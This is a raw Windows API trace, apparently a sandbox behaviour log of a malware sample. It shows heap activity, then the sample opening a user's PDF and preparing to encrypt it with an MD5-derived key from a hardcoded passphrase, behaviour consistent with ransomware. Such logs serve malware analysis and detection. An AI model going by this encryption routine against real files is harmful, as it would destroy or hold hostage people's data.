(HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.584] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0079.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.584] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0079.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0079.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.584] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\Ko5KMbWIjv.pdf", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a6b8c0, ftCreationTime.dwHighDateTime=0x1d5eade, ftLastAccessTime.dwLowDateTime=0x58f88120, ftLastAccessTime.dwHighDateTime=0x1d5e654, ftLastWriteTime.dwLowDateTime=0x58f88120, ftLastWriteTime.dwHighDateTime=0x1d5e654, nFileSizeHigh=0x0, nFileSizeLow=0xadcc, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="Ko5KMbWIjv.pdf", cAlternateFileName="KO5KMB~1.PDF")) returned 0x41ac600 [0079.584] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0079.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0079.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0079.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0079.585] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0079.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0079.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0079.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0079.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0079.585] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0079.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0079.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0079.586] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0079.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0079.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24d0 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0079.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0079.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0079.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0079.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0079.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0079.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0079.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.588] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0079.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.590] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0079.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cab08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0079.590] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\Ko5KMbWIjv.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ko5kmbwijv.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0079.590] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.590] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca5c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0079.591] CloseHandle (hObject=0x258) returned 1 [0079.591] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.591] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0079.591] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\Ko5KMbWIjv.pdf", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a6b8c0, ftCreationTime.dwHighDateTime=0x1d5eade, ftLastAccessTime.dwLowDateTime=0x58f88120, ftLastAccessTime.dwHighDateTime=0x1d5e654, ftLastWriteTime.dwLowDateTime=0x58f88120, ftLastWriteTime.dwHighDateTime=0x1d5e654, nFileSizeHigh=0x0, nFileSizeLow=0xadcc, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Ko5KMbWIjv.pdf", cAlternateFileName="KO5KMB~1.PDF")) returned 0x41ac140 [0079.591] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0079.591] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.591] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.591] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0079.591] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.591] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0079.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0079.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797028, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0079.592] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a4ae0) returned 1 [0079.592] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0079.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.592] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0079.592] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.593] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cac10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0079.594] CryptCreateHash (in: hProv=0x41a4ae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0079.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.594] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 